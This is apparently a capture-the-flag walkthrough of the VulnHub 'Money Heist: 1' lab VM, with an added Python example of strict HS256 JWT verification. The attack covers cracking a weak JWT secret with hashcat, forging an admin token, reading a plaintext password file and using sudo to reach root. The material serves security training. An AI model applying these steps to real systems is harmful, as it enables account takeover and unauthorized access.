Money Heist: 1
VM page: http://www.vulnhub.com/entry/money-heist-1,592/
Description
“The Professor” has a plan to pull off the biggest heist in recorded history – to print billions of Flags . To help him carry out the ambitious plan, he recruits eight people with certain abilities and who have nothing to lose.
Service enumeration
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open http
3000/tcp open http Node.js Express framework
3001/tcp open nessus?
Web penetration testing
Visit port 80. After registering a user, the page says the account is not an administrator. Clearly some kind of privilege escalation is expected, so look at the cookie.

The cookie is a JWT; the base64-decoded payload is:
{
"email": "test1@test.com",
"iat": 1604066840,
"exp": 1604070440
}
First crack the signing secret with hashcat; the secret key is professor.
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6InRlc3QxQHRlc3QuY29tIiwiaWF0IjoxNjA0MDY2ODQwLCJleHAiOjE2MDQwNzA0NDB9.68Qh1wCLajO59G6BepaQirUUyTOf_IgHwsgvLew_UPE:professor
Paste the token into jwt.io, change email to admin, replace the cookie and refresh the page: the admin flag is obtained.
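Why the cracked secret decides everything, as an added example that is not part of the original write-up: a minimal HS256 signer/verifier in Python that decodes the token shown above, checks a token the way the server should (algorithm pinned, constant-time HMAC compare, exp enforced), and flags any key shorter than the 256 bits RFC 7518 requires for HS256. Only PAGE_TOKEN comes from the page; STRONG_SECRET and all function names are my own constructed values.

```python
import base64
import hashlib
import hmac
import json
import time

# Token captured in the walkthrough above (the port-80 app's cookie).
PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJlbWFpbCI6InRlc3QxQHRlc3QuY29tIiwiaWF0IjoxNjA0MDY2ODQwLCJleHAiOjE2MDQwNzA0NDB9."
              "68Qh1wCLajO59G6BepaQirUUyTOf_IgHwsgvLew_UPE")
# Constructed 256-bit key standing in for a properly generated server secret.
STRONG_SECRET = hashlib.sha256(b"constructed-demo-key").digest()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def decode_unverified(token: str):
    """Header and claims exactly as the browser sees them: base64url is encoding, not protection."""
    header, body, _sig = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(body))

def sign_hs256(claims: dict, secret: bytes) -> str:
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"

def verify_hs256(token: str, secret: bytes, now=None):
    """Return the claims only if alg is HS256, the HMAC matches and exp lies in the future."""
    try:
        header, body, sig = token.split(".")
        if json.loads(b64url_decode(header)).get("alg") != "HS256":
            return None  # refuse alg=none and key-confusion headers outright
        expected = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig)):
            return None
        claims = json.loads(b64url_decode(body))
    except (ValueError, AttributeError, UnicodeDecodeError):
        return None
    if claims.get("exp", 0) <= (time.time() if now is None else now):
        return None
    return claims

def secret_is_weak(secret: bytes) -> bool:
    """HS256 keys should be at least 256 bits; a nine-byte dictionary word fails on length alone."""
    return len(secret) < 32

if __name__ == "__main__":
    print(decode_unverified(PAGE_TOKEN)[1])
    print("page token accepted under the cracked secret:",
          verify_hs256(PAGE_TOKEN, b"professor", now=1604066900) is not None)
    print("'professor' is a weak key:", secret_is_weak(b"professor"))
```

A server that applies secret_is_weak at startup would have refused the key this box ships with, and a token forged with any other key fails verify_hs256 regardless of what the payload claims.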
Log in over SSH as berlin (this was a small detour: berlin's home directory contains a packet capture, and after a long analysis it turned out to be nothing more than a conversation between berlin and nairobi). Go to /home and notice that the professor user's home directory is readable.
berlin@ubuntu:/home$ ls -all
total 28
drwxr-xr-x 7 root root 4096 Oct 13 03:06 .
drwxr-xr-x 24 root root 4096 Sep 24 17:41 ..
drwx------ 5 berlin berlin 4096 Oct 16 13:27 berlin
drwxr-xr-x 3 root root 4096 Sep 23 16:48 .ecryptfs
drwx------ 4 nairobi nairobi 4096 Oct 16 14:51 nairobi
drwxr-xr-x 4 professor professor 4096 Oct 16 18:06 professor
drwx------ 5 tokyo tokyo 4096 Oct 16 14:01 tokyo
berlin@ubuntu:/home$ cd professor/
berlin@ubuntu:/home/professor$ ls -all
total 32
drwxr-xr-x 4 professor professor 4096 Oct 16 18:06 .
drwxr-xr-x 7 root root 4096 Oct 13 03:06 ..
-rw------- 1 professor professor 1180 Oct 30 19:34 .bash_history
drwx------ 2 professor professor 4096 Oct 13 16:41 .cache
-rw-r--r-- 1 root root 4465 Oct 16 15:18 finalflag.txt
drwxrwxr-x 2 professor professor 4096 Oct 14 10:36 .nano
-rw-rw-r-- 1 professor professor 28 Oct 16 18:06 passwd.txt
-rw-r--r-- 1 professor professor 0 Oct 13 16:43 .sudo_as_admin_successful
passwd.txt holds that user's password. Switch to professor, and root plus the final flag follow.
berlin@ubuntu:/home/professor$ cat passwd.txt
st@y_tuned_for_@nother_one
berlin@ubuntu:/home/professor$ su professor
Password:
professor@ubuntu:~$ sudo -l
[sudo] password for professor:
Matching Defaults entries for professor on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User professor may run the following commands on ubuntu:
(ALL : ALL) ALL
professor@ubuntu:~$ sudo cat finalflag.txt
██████╗ ███████╗██╗ ██╗ █████╗ ██████╗██╗ █████╗ ██████╗
██╔══██╗██╔════╝██║ ██║ ██╔══██╗ ██╔════╝██║██╔══██╗██╔═══██╗
██████╔╝█████╗ ██║ ██║ ███████║ ██║ ██║███████║██║ ██║
██╔══██╗██╔══╝ ██║ ██║ ██╔══██║ ██║ ██║██╔══██║██║ ██║
██████╔╝███████╗███████╗███████╗██║ ██║ ╚██████╗██║██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝╚═╝ ╚═╝ ╚═════╝
██╗ █████╗ ██████╗ █████╗ ███████╗ █████╗ ██████╗ ███████╗ ██████╗ █████╗ ██████╗ ███████╗██╗
██║ ██╔══██╗ ██╔════╝██╔══██╗██╔════╝██╔══██╗ ██╔══██╗██╔════╝ ██╔══██╗██╔══██╗██╔══██╗██╔════╝██║
██║ ███████║ ██║ ███████║███████╗███████║ ██║ ██║█████╗ ██████╔╝███████║██████╔╝█████╗ ██║
██║ ██╔══██║ ██║ ██╔══██║╚════██║██╔══██║ ██║ ██║██╔══╝ ██╔═══╝ ██╔══██║██╔═══╝ ██╔══╝ ██║
███████╗██║ ██║ ╚██████╗██║ ██║███████║██║ ██║ ██████╔╝███████╗ ██║ ██║ ██║██║ ███████╗███████╗
╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚══════╝╚══════╝
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
--------------------------------------------
You have successfully completed the $ HEIST $ .
--------------------------------------------
Created by Team :- VIEH GROUP
-----------------------------
Visit us:- www.viehgroup.com
-----------------------------
Twitter :- @viehgroup
@shaileshkumar__
@shrey_sancheti
@manish67367326
---------------------------------------------
-->> flag4{W3@kn3ss_!s_not_!n_us_!t_!s_!n_wh@t_w3_h@ve_outs!de} <<--
---------------------------------------------
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
This post is a detailed walkthrough of the Money Heist: 1 VM. Service enumeration and web testing show that after registering on port 80 the application requires a privilege escalation. The JWT cookie is base64-decoded, its secret key is cracked with hashcat, and the email claim is changed to admin and re-signed to obtain the admin flag. An SSH login as berlin follows; the packet capture in that home directory is a dead end, but professor's password is found in passwd.txt, and switching to that user yields root and the final flag.